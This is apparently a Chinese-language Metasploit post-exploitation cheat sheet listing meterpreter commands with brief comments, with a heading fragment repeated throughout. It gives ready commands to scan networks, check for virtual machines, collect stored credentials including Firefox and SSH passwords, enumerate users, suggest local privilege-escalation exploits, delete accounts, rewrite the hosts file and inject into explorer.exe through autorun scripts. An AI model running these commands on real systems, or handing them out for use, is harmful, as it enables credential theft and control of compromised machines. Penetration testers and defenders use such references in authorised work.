POST子產品
run post/windows/gather/arp_scanner RHOSTS=192.168.0.0/24
#ARP掃描
Msf後滲透測試階段_POST子產品 run post/windows/gather/checkvm #查詢目标是不是虛拟機
Msf後滲透測試階段_POST子產品 run post/windows/gather/credentials/credential_collector
#檢視使用者資訊
run post/windows/gather/enum_applications
#檢視安裝了哪些應用程式
Msf後滲透測試階段_POST子產品 run post/windows/gather/enum_logged_on_users
#檢視目前正在登入的使用者
Msf後滲透測試階段_POST子產品 run post/windows/gather/enum_snmp
#檢視目标機器的snmp配置
Msf後滲透測試階段_POST子產品 run post/multi/recon/local_exploit_suggester
#檢視本地提權漏洞
Msf後滲透測試階段_POST子產品 run post/windows/manage/delete_user USERNAME=sbz
#删除使用者賬号
Msf後滲透測試階段_POST子產品 run post/multi/gather/env
#檢視目标機器環境變量
Msf後滲透測試階段_POST子產品 run post/multi/gather/firefox_creds
#檢視目标本機的firefox流量的賬号密碼
run post/multi/gather/ssh_creds
#檢視本機SSH的賬号密碼
自動執行meterpreter腳本
set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com #修改host檔案
set InitialAutoRunScript checkvm
自動執行post子產品
set initialautorunscript migrate -n explorer.exe #注入程序
set autorunscript post/windows/gather/dumplinks #查詢最近檔案